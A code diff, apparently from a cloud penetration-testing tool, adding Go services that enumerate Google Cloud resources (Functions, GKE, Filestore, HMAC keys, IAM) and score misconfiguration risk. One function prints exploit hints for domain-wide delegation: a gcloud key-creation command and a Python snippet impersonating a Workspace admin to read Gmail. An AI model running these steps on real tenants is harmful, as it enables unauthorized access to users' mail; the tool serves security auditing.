"gsuite", "admin", + "gmail", "drive", "calendar", "directory", "impersonat", + } + + for _, pattern := range dwdPatterns { + if strings.Contains(emailLower, pattern) || + strings.Contains(descLower, pattern) || + strings.Contains(nameLower, pattern) { + return true + } + } + + return false +} + +func (s *DomainWideDelegationService) analyzeRisk(account DWDServiceAccount) (string, []string) { + var reasons []string + score := 0 + + if account.DWDEnabled { + reasons = append(reasons, "Domain-wide delegation ENABLED (OAuth2 Client ID present)") + score += 3 + } + + hasKeys := len(account.Keys) > 0 + if hasKeys { + reasons = append(reasons, fmt.Sprintf("Has %d user-managed key(s) - can be used for impersonation", len(account.Keys))) + score += 2 + } + + if account.DWDEnabled && hasKeys { + reasons = append(reasons, "CRITICAL: DWD enabled + keys exist = can impersonate any Workspace user!") + score += 2 + } + + // Check for suspicious naming + if s.looksLikeDWDAccount(account) && !account.DWDEnabled { + reasons = append(reasons, "Name suggests DWD purpose but OAuth2 Client ID not detected") + score += 1 + } + + if score >= 5 { + return "CRITICAL", reasons + } else if score >= 3 { + return "HIGH", reasons + } else if score >= 2 { + return "MEDIUM", reasons + } else if score >= 1 { + return "LOW", reasons + } + return "INFO", reasons +} + +func (s *DomainWideDelegationService) generateExploitCommands(account DWDServiceAccount) []string { + var commands []string + + if !account.DWDEnabled { + commands = append(commands, + "# DWD not confirmed - OAuth2 Client ID not present", + "# Check Google Admin Console: Security > API Controls > Domain-wide Delegation", + ) + return commands + } + + commands = append(commands, + fmt.Sprintf("# Domain-Wide Delegation Service Account: %s", account.Email), + fmt.Sprintf("# OAuth2 Client ID: %s", account.OAuth2ClientID), + "", + "# To exploit DWD, you need:", + "# 1. A key file for this service account", + "# 2. The email of a Workspace user to impersonate", + "# 3. Knowledge of which scopes are authorized in Admin Console", + "", + ) + + if len(account.Keys) > 0 { + commands = append(commands, + "# Create a new key (if you have iam.serviceAccountKeys.create permission):", + fmt.Sprintf("gcloud iam service-accounts keys create /tmp/key.json --iam-account=%s", account.Email), + "", + ) + } + + commands = append(commands, + "# Python exploit example:", + "# from google.oauth2 import service_account", + "# from googleapiclient.discovery import build", + "#", + "# creds = service_account.Credentials.from_service_account_file(", + "# 'key.json',", + fmt.Sprintf("# scopes=['https://www.googleapis.com/auth/gmail.readonly'],"), + "# subject='admin@yourdomain.com' # User to impersonate", + "# )", + "#", + "# gmail = build('gmail', 'v1', credentials=creds)", + "# messages = gmail.users().messages().list(userId='me').execute()", + "", + "# Common scopes to test (must be authorized in Admin Console):", + ) + + for _, scope := range CommonWorkspaceScopes[:5] { // First 5 most useful scopes + commands = append(commands, fmt.Sprintf("# - %s", scope)) + } + + return commands +} diff --git a/gcp/services/filestoreService/filestoreService.go b/gcp/services/filestoreService/filestoreService.go new file mode 100644 index 00000000..837d259f --- /dev/null +++ b/gcp/services/filestoreService/filestoreService.go @@ -0,0 +1,96 @@ +package filestoreservice + +import ( + "context" + "fmt" + "strings" + + gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" + file "google.golang.org/api/file/v1" +) + +type FilestoreService struct { + session *gcpinternal.SafeSession +} + +func New() *FilestoreService { + return &FilestoreService{} +} + +type FilestoreInstanceInfo struct { + Name string `json:"name"` + ProjectID string `json:"projectId"` + Location string `json:"location"` + Tier string `json:"tier"` + State string `json:"state"` + Network string `json:"network"` + IPAddresses []string `json:"ipAddresses"` + Shares []ShareInfo `json:"shares"` + CreateTime string `json:"createTime"` +} + +type ShareInfo struct { + Name string `json:"name"` + CapacityGB int64 `json:"capacityGb"` +} + +func (s *FilestoreService) ListInstances(projectID string) ([]FilestoreInstanceInfo, error) { + ctx := context.Background() + service, err := file.NewService(ctx) + if err != nil { + return nil, gcpinternal.ParseGCPError(err, "file.googleapis.com") + } + + var instances []FilestoreInstanceInfo + parent := fmt.Sprintf("projects/%s/locations/-", projectID) + + req := service.Projects.Locations.Instances.List(parent) + err = req.Pages(ctx, func(page *file.ListInstancesResponse) error { + for _, instance := range page.Instances { + info := FilestoreInstanceInfo{ + Name: extractResourceName(instance.Name), + ProjectID: projectID, + Location: extractLocation(instance.Name), + Tier: instance.Tier, + State: instance.State, + CreateTime: instance.CreateTime, + } + + if len(instance.Networks) > 0 { + info.Network = instance.Networks[0].Network + info.IPAddresses = instance.Networks[0].IpAddresses + } + + for _, share := range instance.FileShares { + info.Shares = append(info.Shares, ShareInfo{ + Name: share.Name, + CapacityGB: share.CapacityGb, + }) + } + instances = append(instances, info) + } + return nil + }) + if err != nil { + return nil, gcpinternal.ParseGCPError(err, "file.googleapis.com") + } + return instances, nil +} + +func extractResourceName(name string) string { + parts := strings.Split(name, "/") + if len(parts) > 0 { + return parts[len(parts)-1] + } + return name +} + +func extractLocation(name string) string { + parts := strings.Split(name, "/") + for i, part := range parts { + if part == "locations" && i+1 < len(parts) { + return parts[i+1] + } + } + return "" +} diff --git a/gcp/services/functionsService/functionsService.go b/gcp/services/functionsService/functionsService.go new file mode 100644 index 00000000..98329358 --- /dev/null +++ b/gcp/services/functionsService/functionsService.go @@ -0,0 +1,302 @@ +package functionsservice + +import ( + "context" + "fmt" + "strings" + + gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" + cloudfunctions "google.golang.org/api/cloudfunctions/v2" +) + +type FunctionsService struct{} + +func New() *FunctionsService { + return &FunctionsService{} +} + +// FunctionInfo holds Cloud Function details with security-relevant information +type FunctionInfo struct { + // Basic info + Name string + ProjectID string + Region string + State string + Description string + + // Runtime info + Runtime string + EntryPoint string + BuildID string + UpdateTime string + + // Security-relevant configuration + ServiceAccount string + IngressSettings string // ALL_TRAFFIC, INTERNAL_ONLY, INTERNAL_AND_GCLB + VPCConnector string + VPCEgressSettings string // PRIVATE_RANGES_ONLY, ALL_TRAFFIC + AllTrafficOnLatest bool + + // Resource configuration (new enhancements) + AvailableMemoryMB int64 // Memory in MB + AvailableCPU string // CPU (e.g., "1", "2") + TimeoutSeconds int64 // Timeout in seconds + MaxInstanceCount int64 // Max concurrent instances + MinInstanceCount int64 // Min instances (cold start prevention) + MaxInstanceRequestConcurrency int64 // Max concurrent requests per instance + + // Trigger info + TriggerType string // HTTP, Pub/Sub, Cloud Storage, etc. + TriggerURL string // For HTTP functions + TriggerEventType string + TriggerResource string + TriggerRetryPolicy string // RETRY_POLICY_RETRY, RETRY_POLICY_DO_NOT_RETRY + + // Environment variables (sanitized - just names, not values) + EnvVarCount int + SecretEnvVarCount int + SecretVolumeCount int + + // IAM (if retrieved) + IAMBindings []IAMBinding // All IAM bindings for this function + IsPublic bool // allUsers or allAuthenticatedUsers can invoke + + // Pentest-specific fields + EnvVarNames []string // Names of env vars (may hint at secrets) + SecretEnvVarNames []string // Names of secret env vars + SecretVolumeNames []string // Names of secret volumes + SourceLocation string // GCS or repo source location + SourceType string // GCS, Repository +} + +// IAMBinding represents a single IAM role binding +type IAMBinding struct { + Role string + Member string +} + +// Functions retrieves all Cloud Functions in a project across all regions +func (fs *FunctionsService) Functions(projectID string) ([]FunctionInfo, error) { + ctx := context.Background() + + service, err := cloudfunctions.NewService(ctx) + if err != nil { + return nil, gcpinternal.ParseGCPError(err, "cloudfunctions.googleapis.com") + } + + var functions []FunctionInfo + + // List functions across all locations + parent := fmt.Sprintf("projects/%s/locations/-", projectID) + + call := service.Projects.Locations.Functions.List(parent) + err = call.Pages(ctx, func(page *cloudfunctions.ListFunctionsResponse) error { + for _, fn := range page.Functions { + info := parseFunctionInfo(fn, projectID) + + // Try to get IAM policy + iamPolicy, iamErr := fs.getFunctionIAMPolicy(service, fn.Name) + if iamErr == nil && iamPolicy != nil { + info.IAMBindings, info.IsPublic = parseIAMBindings(iamPolicy) + } + + functions = append(functions, info) + } + return nil + }) + + if err != nil { + return nil, gcpinternal.ParseGCPError(err, "cloudfunctions.googleapis.com") + } + + return functions, nil +} + +// parseFunctionInfo extracts relevant information from a Cloud Function +func parseFunctionInfo(fn *cloudfunctions.Function, projectID string) FunctionInfo { + info := FunctionInfo{ + Name: extractFunctionName(fn.Name), + ProjectID: projectID, + State: fn.State, + } + + // Extract region from function name + // Format: projects/{project}/locations/{location}/functions/{name} + parts := strings.Split(fn.Name, "/") + if len(parts) >= 4 { + info.Region = parts[3] + } + + // Build configuration + if fn.BuildConfig != nil { + info.Runtime = fn.BuildConfig.Runtime + info.EntryPoint = fn.BuildConfig.EntryPoint + info.BuildID = fn.BuildConfig.Build + + // Extract source location (pentest-relevant) + if fn.BuildConfig.Source != nil { + if fn.BuildConfig.Source.StorageSource != nil { + info.SourceType = "GCS" + info.SourceLocation = fmt.Sprintf("gs://%s/%s", + fn.BuildConfig.Source.StorageSource.Bucket, + fn.BuildConfig.Source.StorageSource.Object) + } else if fn.BuildConfig.Source.RepoSource != nil { + info.SourceType = "Repository" + info.SourceLocation = fmt.Sprintf("%s/%s@%s", + fn.BuildConfig.Source.RepoSource.ProjectId, + fn.BuildConfig.Source.RepoSource.RepoName, + fn.BuildConfig.Source.RepoSource.BranchName) + } + } + } + + // Service configuration + if fn.ServiceConfig != nil { + info.ServiceAccount = fn.ServiceConfig.ServiceAccountEmail + info.IngressSettings = fn.ServiceConfig.IngressSettings + info.VPCConnector = fn.ServiceConfig.VpcConnector + info.VPCEgressSettings = fn.ServiceConfig.VpcConnectorEgressSettings + info.AllTrafficOnLatest = fn.ServiceConfig.AllTrafficOnLatestRevision + + // Resource configuration (new enhancements) + if fn.ServiceConfig.AvailableMemory != "" { + // Parse memory string (e.g., "256M", "1G") + memStr := fn.ServiceConfig.AvailableMemory + if strings.HasSuffix(memStr, "M") { + if val, err := parseMemoryMB(memStr); err == nil { + info.AvailableMemoryMB = val + } + } else if strings.HasSuffix(memStr, "G") { + if val, err := parseMemoryMB(memStr); err == nil { + info.AvailableMemoryMB = val + } + } + } + info.AvailableCPU = fn.ServiceConfig.AvailableCpu + info.TimeoutSeconds = fn.ServiceConfig.TimeoutSeconds + info.MaxInstanceCount = fn.ServiceConfig.MaxInstanceCount + info.MinInstanceCount = fn.ServiceConfig.MinInstanceCount + info.MaxInstanceRequestConcurrency = fn.ServiceConfig.MaxInstanceRequestConcurrency + + // Extract environment variable names (pentest-relevant - may hint at secrets) + if fn.ServiceConfig.EnvironmentVariables != nil { + info.EnvVarCount = len(fn.ServiceConfig.EnvironmentVariables) + for key := range fn.ServiceConfig.EnvironmentVariables { + info.EnvVarNames = append(info.EnvVarNames, key) + } + } + + // Extract secret environment variable names + if fn.ServiceConfig.SecretEnvironmentVariables != nil { + info.SecretEnvVarCount = len(fn.ServiceConfig.SecretEnvironmentVariables) + for _, secret := range fn.ServiceConfig.SecretEnvironmentVariables { + if secret != nil { + info.SecretEnvVarNames = append(info.SecretEnvVarNames, secret.Key) + } + } + } + + // Extract secret volume names + if fn.ServiceConfig.SecretVolumes != nil { + info.SecretVolumeCount = len(fn.ServiceConfig.SecretVolumes) + for _, vol := range fn.ServiceConfig.SecretVolumes { + if vol != nil { + info.SecretVolumeNames = append(info.SecretVolumeNames, vol.Secret) + } + } + } + + // Get HTTP trigger URL from service config + info.TriggerURL = fn.ServiceConfig.Uri + } + + // Event trigger configuration + if fn.EventTrigger != nil { + info.TriggerType = "Event" + info.TriggerEventType = fn.EventTrigger.EventType + info.TriggerResource = fn.EventTrigger.PubsubTopic + if info.TriggerResource == "" { + info.TriggerResource = fn.EventTrigger.Channel + } + } else if info.TriggerURL != "" { + info.TriggerType = "HTTP" + } + + info.Description = fn.Description + info.UpdateTime = fn.UpdateTime + + return info +} + +// getFunctionIAMPolicy retrieves the IAM policy for a function +func (fs *FunctionsService) getFunctionIAMPolicy(service *cloudfunctions.Service, functionName string) (*cloudfunctions.Policy, error) { + ctx := context.Background() + + policy, err := service.Projects.Locations.Functions.GetIamPolicy(functionName).Context(ctx).Do() + if err != nil { + return nil, err + } + + return policy, nil +} + +// parseIAMBindings extracts all IAM bindings and checks for public access +func parseIAMBindings(policy *cloudfunctions.Policy) ([]IAMBinding, bool) { + var bindings []IAMBinding + isPublic := false + + for _, binding := range policy.Bindings { + for _, member := range binding.Members { + bindings = append(bindings, IAMBinding{ + Role: binding.Role, + Member: member, + }) + + // Check for public access on invoker roles + if (binding.Role == "roles/cloudfunctions.invoker" || + binding.Role == "roles/run.invoker") && + (member == "allUsers" || member == "allAuthenticatedUsers") { + isPublic = true + } + } + } + + return bindings, isPublic +} + +// extractFunctionName extracts just the function name from the full resource name +func extractFunctionName(fullName string) string { + parts := strings.Split(fullName, "/") + if len(parts) > 0 { + return parts[len(parts)-1] + } + return fullName +} + +// parseMemoryMB parses a memory string like "256M" or "1G" to MB +func parseMemoryMB(memStr string) (int64, error) { + memStr = strings.TrimSpace(memStr) + if len(memStr) == 0 { + return 0, fmt.Errorf("empty memory string") + } + + unit := memStr[len(memStr)-1] + valueStr := memStr[:len(memStr)-1] + + var value int64 + _, err := fmt.Sscanf(valueStr, "%d", &value) + if err != nil { + return 0, err + } + + switch unit { + case 'M', 'm': + return value, nil + case 'G', 'g': + return value * 1024, nil + case 'K', 'k': + return value / 1024, nil + default: + return 0, fmt.Errorf("unknown unit: %c", unit) + } +} diff --git a/gcp/services/gkeService/gkeService.go b/gcp/services/gkeService/gkeService.go new file mode 100644 index 00000000..28a336f3 --- /dev/null +++ b/gcp/services/gkeService/gkeService.go @@ -0,0 +1,393 @@ +package gkeservice + +import ( + "context" + "fmt" + "strings" + + gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" + container "google.golang.org/api/container/v1" +) + +type GKEService struct{} + +func New() *GKEService { + return &GKEService{} +} + +// ClusterInfo holds GKE cluster details with security-relevant information +type ClusterInfo struct { + // Basic info + Name string + ProjectID string + Location string // Zone or Region + Status string + Description string + + // Version info + CurrentMasterVersion string + CurrentNodeVersion string + ReleaseChannel string + + // Network configuration + Network string + Subnetwork string + ClusterIPv4CIDR string + ServicesIPv4CIDR string + Endpoint string // Master endpoint + PrivateCluster bool + MasterAuthorizedOnly bool + MasterAuthorizedCIDRs []string + + // Security configuration + NetworkPolicy bool + PodSecurityPolicy bool // Deprecated but may still be in use + BinaryAuthorization bool + ShieldedNodes bool + SecureBoot bool + IntegrityMonitoring bool + WorkloadIdentity string // Workload Identity Pool + NodeServiceAccount string + + // Authentication + LegacyABAC bool // Legacy ABAC authorization + IssueClientCertificate bool + BasicAuthEnabled bool // Deprecated + + // Logging and Monitoring + LoggingService string + MonitoringService string + + // Node pool info (aggregated) + NodePoolCount int + TotalNodeCount int + AutoscalingEnabled bool + + // GKE Autopilot + Autopilot bool + + // Node Auto-provisioning + NodeAutoProvisioning bool + + // Maintenance configuration + MaintenanceWindow string + MaintenanceExclusions []string + + // Addons + ConfigConnector bool + IstioEnabled bool // Anthos Service Mesh / Istio + + // Security issues detected + SecurityIssues []string +} + +// NodePoolInfo holds node pool details +type NodePoolInfo struct { + ClusterName string + Name string + ProjectID string + Location string + Status string + NodeCount int + MachineType string + DiskSizeGb int64 + DiskType string + ImageType string + ServiceAccount string + AutoRepair bool + AutoUpgrade bool + SecureBoot bool + IntegrityMonitoring bool + Preemptible bool + Spot bool + OAuthScopes []string + // Pentest-specific fields + HasCloudPlatformScope bool // Full access to GCP + RiskyScopes []string // Scopes that enable attacks +} + +// Clusters retrieves all GKE clusters in a project +func (gs *GKEService) Clusters(projectID string) ([]ClusterInfo, []NodePoolInfo, error) { + ctx := context.Background() + + service, err := container.NewService(ctx) + if err != nil { + return nil, nil, gcpinternal.ParseGCPError(err, "container.googleapis.com") + } + + // List clusters across all locations + parent := fmt.Sprintf("projects/%s/locations/-", projectID) + + resp, err := service.Projects.Locations.Clusters.List(parent).Do() + if err != nil { + return nil, nil, gcpinternal.ParseGCPError(err, "container.googleapis.com") + } + + var clusters []ClusterInfo + var nodePools []NodePoolInfo + + for _, cluster := range resp.Clusters { + info := parseClusterInfo(cluster, projectID) + clusters = append(clusters, info) + + // Parse node pools + for _, np := range cluster.NodePools { + npInfo := parseNodePoolInfo(np, cluster.Name, projectID, cluster.Location) + nodePools = append(nodePools, npInfo) + } + } + + return clusters, nodePools, nil +} + +// parseClusterInfo extracts security-relevant information from a GKE cluster +func parseClusterInfo(cluster *container.Cluster, projectID string) ClusterInfo { + info := ClusterInfo{ + Name: cluster.Name, + ProjectID: projectID, + Location: cluster.Location, + Status: cluster.Status, + Description: cluster.Description, + CurrentMasterVersion: cluster.CurrentMasterVersion, + CurrentNodeVersion: cluster.CurrentNodeVersion, + Endpoint: cluster.Endpoint, + Network: cluster.Network, + Subnetwork: cluster.Subnetwork, + ClusterIPv4CIDR: cluster.ClusterIpv4Cidr, + ServicesIPv4CIDR: cluster.ServicesIpv4Cidr, + LoggingService: cluster.LoggingService, + MonitoringService: cluster.MonitoringService, + SecurityIssues: []string{}, + } + + // Release channel + if cluster.ReleaseChannel != nil { + info.ReleaseChannel = cluster.ReleaseChannel.Channel + } + + // Private cluster configuration + if cluster.PrivateClusterConfig != nil { + info.PrivateCluster = cluster.PrivateClusterConfig.EnablePrivateNodes + if cluster.PrivateClusterConfig.EnablePrivateEndpoint { + info.Endpoint = cluster.PrivateClusterConfig.PrivateEndpoint + } + } + + // Master authorized networks + if cluster.MasterAuthorizedNetworksConfig != nil { + info.MasterAuthorizedOnly = cluster.MasterAuthorizedNetworksConfig.Enabled + for _, cidr := range cluster.MasterAuthorizedNetworksConfig.CidrBlocks { + info.MasterAuthorizedCIDRs = append(info.MasterAuthorizedCIDRs, cidr.CidrBlock) + } + } + + // Network policy + if cluster.NetworkPolicy != nil { + info.NetworkPolicy = cluster.NetworkPolicy.Enabled + } + + // Binary authorization + if cluster.BinaryAuthorization != nil { + info.BinaryAuthorization = cluster.BinaryAuthorization.Enabled + } + + // Shielded nodes + if cluster.ShieldedNodes != nil { + info.ShieldedNodes = cluster.ShieldedNodes.Enabled + } + + // Workload Identity + if cluster.WorkloadIdentityConfig != nil { + info.WorkloadIdentity = cluster.WorkloadIdentityConfig.WorkloadPool + } + + // Legacy ABAC (should be disabled) + if cluster.LegacyAbac != nil { + info.LegacyABAC = cluster.LegacyAbac.Enabled + } + + // Master auth (legacy) + if cluster.MasterAuth != nil { + info.IssueClientCertificate = cluster.MasterAuth.ClientCertificateConfig != nil && + cluster.MasterAuth.ClientCertificateConfig.IssueClientCertificate + // Check for basic auth (deprecated) + if cluster.MasterAuth.Username != "" { + info.BasicAuthEnabled = true + } + } + + // Count node pools and nodes + info.NodePoolCount = len(cluster.NodePools) + for _, np := range cluster.NodePools { + if np.Autoscaling != nil && np.Autoscaling.Enabled { + info.AutoscalingEnabled = true + } + info.TotalNodeCount += int(np.InitialNodeCount) + + // Get node service account from first pool + if info.NodeServiceAccount == "" && np.Config != nil { + info.NodeServiceAccount = np.Config.ServiceAccount + } + + // Check shielded node config + if np.Config != nil && np.Config.ShieldedInstanceConfig != nil { + info.SecureBoot = np.Config.ShieldedInstanceConfig.EnableSecureBoot + info.IntegrityMonitoring = np.Config.ShieldedInstanceConfig.EnableIntegrityMonitoring + } + } + + // GKE Autopilot mode + if cluster.Autopilot != nil { + info.Autopilot = cluster.Autopilot.Enabled + } + + // Node Auto-provisioning + if cluster.Autoscaling != nil { + info.NodeAutoProvisioning = cluster.Autoscaling.EnableNodeAutoprovisioning + } + + // Maintenance configuration + if cluster.MaintenancePolicy != nil && cluster.MaintenancePolicy.Window != nil { + window := cluster.MaintenancePolicy.Window + if window.DailyMaintenanceWindow != nil { + info.MaintenanceWindow = fmt.Sprintf("Daily at %s", window.DailyMaintenanceWindow.StartTime) + } else if window.RecurringWindow != nil { + info.MaintenanceWindow = fmt.Sprintf("Recurring: %s", window.RecurringWindow.Recurrence) + } + // Maintenance exclusions + for name := range window.MaintenanceExclusions { + info.MaintenanceExclusions = append(info.MaintenanceExclusions, name) + } + } + + // Addons configuration + if cluster.AddonsConfig != nil { + // Config Connector + if cluster.AddonsConfig.ConfigConnectorConfig != nil { + info.ConfigConnector = cluster.AddonsConfig.ConfigConnectorConfig.Enabled + } + // Note: IstioConfig was deprecated and removed from the GKE API + // Anthos Service Mesh (ASM) is now the recommended approach + } + + // Identify security issues + info.SecurityIssues = identifySecurityIssues(info) + + return info +} + +// parseNodePoolInfo extracts information from a node pool +func parseNodePoolInfo(np *container.NodePool, clusterName, projectID, location string) NodePoolInfo { + info := NodePoolInfo{ + ClusterName: clusterName, + Name: np.Name, + ProjectID: projectID, + Location: location, + Status: np.Status, + NodeCount: int(np.InitialNodeCount), + } + + if np.Config != nil { + info.MachineType = np.Config.MachineType + info.DiskSizeGb = np.Config.DiskSizeGb + info.DiskType = np.Config.DiskType + info.ImageType = np.Config.ImageType + info.ServiceAccount = np.Config.ServiceAccount + info.OAuthScopes = np.Config.OauthScopes + info.Preemptible = np.Config.Preemptible + info.Spot = np.Config.Spot + + if np.Config.ShieldedInstanceConfig != nil { + info.SecureBoot = np.Config.ShieldedInstanceConfig.EnableSecureBoot + info.IntegrityMonitoring = np.Config.ShieldedInstanceConfig.EnableIntegrityMonitoring + } + + // Analyze OAuth scopes for risky permissions + info.HasCloudPlatformScope, info.RiskyScopes = analyzeOAuthScopes(np.Config.OauthScopes) + } + + if np.Management != nil { + info.AutoRepair = np.Management.AutoRepair + info.AutoUpgrade = np.Management.AutoUpgrade + } + + return info +} + +// analyzeOAuthScopes identifies risky OAuth scopes +func analyzeOAuthScopes(scopes []string) (hasCloudPlatform bool, riskyScopes []string) { + riskyPatterns := map[string]string{ + "https://www.googleapis.com/auth/cloud-platform": "Full GCP access", + "https://www.googleapis.com/auth/compute": "Full Compute Engine access", + "https://www.googleapis.com/auth/devstorage.full_control": "Full Cloud Storage access", + "https://www.googleapis.com/auth/devstorage.read_write": "Read/write Cloud Storage", + "https://www.googleapis.com/auth/logging.admin": "Logging admin (can delete logs)", + "https://www.googleapis.com/auth/source.full_control": "Full source repo access", + "https://www.googleapis.com/auth/sqlservice.admin": "Cloud SQL admin", + } + + for _, scope := range scopes { + if scope == "https://www.googleapis.com/auth/cloud-platform" { + hasCloudPlatform = true + } + if desc, found := riskyPatterns[scope]; found { + riskyScopes = append(riskyScopes, fmt.Sprintf("%s: %s", scope, desc)) + } + } + + return +} + +// identifySecurityIssues checks for common security misconfigurations +func identifySecurityIssues(cluster ClusterInfo) []string { + var issues []string + + // Public endpoint without authorized networks + if !cluster.PrivateCluster && !cluster.MasterAuthorizedOnly { + issues = append(issues, "Public endpoint without master authorized networks") + } + + // Legacy ABAC enabled + if cluster.LegacyABAC { + issues = append(issues, "Legacy ABAC authorization enabled") + } + + // Basic auth enabled + if cluster.BasicAuthEnabled { + issues = append(issues, "Basic authentication enabled (deprecated)") + } + + // Client certificate + if cluster.IssueClientCertificate { + issues = append(issues, "Client certificate authentication enabled") + } + + // No network policy + if !cluster.NetworkPolicy { + issues = append(issues, "Network policy not enabled") + } + + // No workload identity + if cluster.WorkloadIdentity == "" { + issues = append(issues, "Workload Identity not configured") + } + + // Shielded nodes not enabled + if !cluster.ShieldedNodes { + issues = append(issues, "Shielded nodes not enabled") + } + + // Default service account on nodes + if cluster.NodeServiceAccount == "default" || + strings.HasSuffix(cluster.NodeServiceAccount, "-compute@developer.gserviceaccount.com") { + issues = append(issues, "Default service account used on nodes") + } + + // No release channel (manual upgrades) + if cluster.ReleaseChannel == "" || cluster.ReleaseChannel == "UNSPECIFIED" { + issues = append(issues, "No release channel configured") + } + + return issues +} + diff --git a/gcp/services/hmacService/hmacService.go b/gcp/services/hmacService/hmacService.go new file mode 100644 index 00000000..f7cc8981 --- /dev/null +++ b/gcp/services/hmacService/hmacService.go @@ -0,0 +1,159 @@ +package hmacservice + +import ( + "context" + "fmt" + "time" + + gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" + "google.golang.org/api/storage/v1" +) + +type HMACService struct { + session *gcpinternal.SafeSession +} + +func New() *HMACService { + return &HMACService{} +} + +func NewWithSession(session *gcpinternal.SafeSession) *HMACService { + return &HMACService{session: session} +} + +// HMACKeyInfo represents a GCS HMAC key (S3-compatible access) +type HMACKeyInfo struct { + AccessID string `json:"accessId"` + ProjectID string `json:"projectId"` + ServiceAccountEmail string `json:"serviceAccountEmail"` + State string `json:"state"` // ACTIVE, INACTIVE, DELETED + TimeCreated time.Time `json:"timeCreated"` + Updated time.Time `json:"updated"` + Etag string `json:"etag"` + // Pentest-specific fields + IsActive bool `json:"isActive"` + RiskLevel string `json:"riskLevel"` + RiskReasons []string `json:"riskReasons"` +} + +// ListHMACKeys lists all HMAC keys in a project +func (s *HMACService) ListHMACKeys(projectID string) ([]HMACKeyInfo, error) { + ctx := context.Background() + var storageService *storage.Service + var err error + + if s.session != nil { + storageService, err = storage.NewService(ctx, s.session.GetClientOption()) + } else { + storageService, err = storage.NewService(ctx) + } + if err != nil { + return nil, gcpinternal.ParseGCPError(err, "storage.googleapis.com") + } + + var keys []HMACKeyInfo + + // List all HMAC keys for the project + req := storageService.Projects.HmacKeys.List(projectID) + err = req.Pages(ctx, func(page *storage.HmacKeysMetadata) error { + for _, key := range page.Items { + info := s.parseHMACKey(key, projectID) + keys = append(keys, info) + } + return nil + }) + if err != nil { + return nil, gcpinternal.ParseGCPError(err, "storage.googleapis.com") + } + + return keys, nil +} + +func (s *HMACService) parseHMACKey(key *storage.HmacKeyMetadata, projectID string) HMACKeyInfo { + info := HMACKeyInfo{ + AccessID: key.AccessId, + ProjectID: projectID, + ServiceAccountEmail: key.ServiceAccountEmail, + State: key.State, + Etag: key.Etag, + IsActive: key.State == "ACTIVE", + RiskReasons: []string{}, + } + + // Parse timestamps + if key.TimeCreated != "" { + if t, err := time.Parse(time.RFC3339, key.TimeCreated); err == nil { + info.TimeCreated = t + } + } + if key.Updated != "" { + if t, err := time.Parse(time.RFC3339, key.Updated); err == nil { + info.Updated = t + } + } + + // Analyze risk + info.RiskLevel, info.RiskReasons = s.analyzeHMACKeyRisk(info) + + return info +} + +func (s *HMACService) analyzeHMACKeyRisk(key HMACKeyInfo) (string, []string) { + var reasons []string + score := 0 + + // Active keys are more risky + if key.IsActive { + reasons = append(reasons, "HMAC key is ACTIVE (can be used for S3-compatible access)") + score += 2 + } + + // Check key age + if !key.TimeCreated.IsZero() { + age := time.Since(key.TimeCreated) + if age > 365*24*time.Hour { + reasons = append(reasons, fmt.Sprintf("Key is over 1 year old (%d days)", int(age.Hours()/24))) + score += 2 + } else if age > 90*24*time.Hour { + reasons = append(reasons, fmt.Sprintf("Key is over 90 days old (%d days)", int(age.Hours()/24))) + score += 1 + } + } + + // Default compute SA HMAC keys are especially risky + if key.ServiceAccountEmail != "" { + if isDefaultComputeSA(key.ServiceAccountEmail) { + reasons = append(reasons, "HMAC key belongs to default compute service account") + score += 1 + } + } + + if score >= 4 { + return "HIGH", reasons + } else if score >= 2 { + return "MEDIUM", reasons + } else if score >= 1 { + return "LOW", reasons + } + return "INFO", reasons +} + +func isDefaultComputeSA(email string) bool { + // Check for default compute service account pattern + return len(email) > 0 && + (contains(email, "-compute@developer.gserviceaccount.com") || + contains(email, "@appspot.gserviceaccount.com")) +} + +func contains(s, substr string) bool { + return len(s) >= len(substr) && (s == substr || len(s) > 0 && containsSubstr(s, substr)) +} + +func containsSubstr(s, substr string) bool { + for i := 0; i <= len(s)-len(substr); i++ { + if s[i:i+len(substr)] == substr { + return true + } + } + return false +} diff --git a/gcp/services/iamService/iamService.go b/gcp/services/iamService/iamService.go index bf63c759..a3d222c1 100644 --- a/gcp/services/iamService/iamService.go +++ b/gcp/services/iamService/iamService.go @@ -4,104 +4,244 @@ import ( "context" "fmt" "strings" + "time" iampb "cloud.google.com/go/iam/apiv1/iampb" resourcemanager "cloud.google.com/go/resourcemanager/apiv3" resourcemanagerpb "cloud.google.com/go/resourcemanager/apiv3/resourcemanagerpb" "github.com/BishopFox/cloudfox/globals" "github.com/BishopFox/cloudfox/internal" + gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" + cloudidentity "google.golang.org/api/cloudidentity/v1" + crmv1 "google.golang.org/api/cloudresourcemanager/v1" + iam "google.golang.org/api/iam/v1" + "google.golang.org/api/iterator" + "google.golang.org/api/option" ) type IAMService struct { - // DataStoreService datastoreservice.DataStoreService + session *gcpinternal.SafeSession } +// New creates a new IAMService (legacy - uses ADC directly) func New() *IAMService { return &IAMService{} } +// NewWithSession creates an IAMService with a SafeSession for managed authentication +func NewWithSession(session *gcpinternal.SafeSession) *IAMService { + return &IAMService{session: session} +} + +// getClientOption returns the appropriate client option based on session +func (s *IAMService) getClientOption() option.ClientOption { + if s.session != nil { + return s.session.GetClientOption() + } + return nil +} + // AncestryResource represents a single resource in the project's ancestry. type AncestryResource struct { Type string `json:"type"` Id string `json:"id"` } +// IAMCondition represents a parsed IAM condition (conditional access policy) +type IAMCondition struct { + Title string `json:"title"` + Description string `json:"description"` + Expression string `json:"expression"` +} + // PolicyBindings represents IAM policy bindings. type PolicyBinding struct { - Role string `json:"role"` - Members []string `json:"members"` - ResourceID string `json:"resourceID"` - ResourceType string - PolicyName string `json:"policyBindings"` - Condition string + Role string `json:"role"` + Members []string `json:"members"` + ResourceID string `json:"resourceID"` + ResourceType string `json:"resourceType"` + PolicyName string `json:"policyBindings"` + Condition string `json:"condition"` + ConditionInfo *IAMCondition `json:"conditionInfo"` // Parsed condition details + HasCondition bool `json:"hasCondition"` // True if binding has conditions + IsInherited bool `json:"isInherited"` // True if inherited from folder/org + InheritedFrom string `json:"inheritedFrom"` // Source of inheritance (folder/org ID) } type PrincipalWithRoles struct { - Name string - Type string - PolicyBindings []PolicyBinding - ResourceID string - ResourceType string + Name string `json:"name"` + Type string `json:"type"` + PolicyBindings []PolicyBinding `json:"policyBindings"` + ResourceID string `json:"resourceID"` + ResourceType string `json:"resourceType"` + // Enhanced fields + Email string `json:"email"` // Clean email without prefix + DisplayName string `json:"displayName"` // 